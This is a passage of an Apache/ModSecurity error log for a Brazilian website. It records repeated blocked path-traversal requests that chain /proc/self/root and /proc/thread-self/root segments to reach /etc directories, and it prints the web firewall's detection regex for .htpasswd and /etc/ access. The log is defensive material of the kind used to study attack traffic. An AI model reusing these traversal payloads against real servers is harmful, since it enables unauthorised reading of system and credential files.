"abupX8df6f5d65gmYZRB2AAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:44:31.693351 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:34180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupX8df6f5d65gmYZRB2QAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:32.884860 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:35866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupYOoXxyEfFpUF8f_fHAAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:33.047256 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.228.61:55162] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abupYda6ubjKNq_cu4YQNQAAA0g"]
[Thu Mar 19 04:44:34.265242 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.241.31:35874] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupYl_V7PWP6ixUYl6KzwAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:34.327015 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:34196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupYta6ubjKNq_cu4YQOQAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:35.638083 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:34206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupY-oXxyEfFpUF8f_fHwAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:38.219473 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:34232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupZQkwaGbbGflqUZCDbAAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:39.356481 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:35878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupZ-oXxyEfFpUF8f_fJAAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:41.157122 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.243.128:53106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupaf-YZRR_7pZ7nDJb-QAAA84"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:43.553037 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:53114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupa8df6f5d65gmYZRB9gAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:45.031500 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:56536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupbfu8EFLIOrSqIptsNwAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:44:47.159567 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:53124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupb_u8EFLIOrSqIptsPwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:47.496721 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.241.31:56542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupbxkFeYa1D6dYQnC8xgAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:48.899089 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.241.31:55042] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupcF_V7PWP6ixUYl6K1AAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:50.323404 2026] [:error] [pid 19093:tid 140411683178240] [client 74.7.241.31:55052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupcl_V7PWP6ixUYl6K1gAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:44:54.460363 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:55066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupduyqAr6etmhZHNoyVQAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:57.175755 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:53140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupeeyqAr6etmhZHNoyWgAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:45:03.294436 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:41170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupf_u8EFLIOrSqIptsVAAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:45:05.195198 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:60076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupgeoXxyEfFpUF8f_fLgAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:45:06.968964 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:55068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupggkwaGbbGflqUZCDegAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:45:11.886713 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.241.31:54418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuphxkFeYa1D6dYQnC81wAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:45:13.219118 2026] [mime_magic:error] [pid 27403:tid 140411599251200] (70014)End of file found: [client 57.141.18.111:37264] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 04:45:23.820466 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:60076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupk-oXxyEfFpUF8f_fRgAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
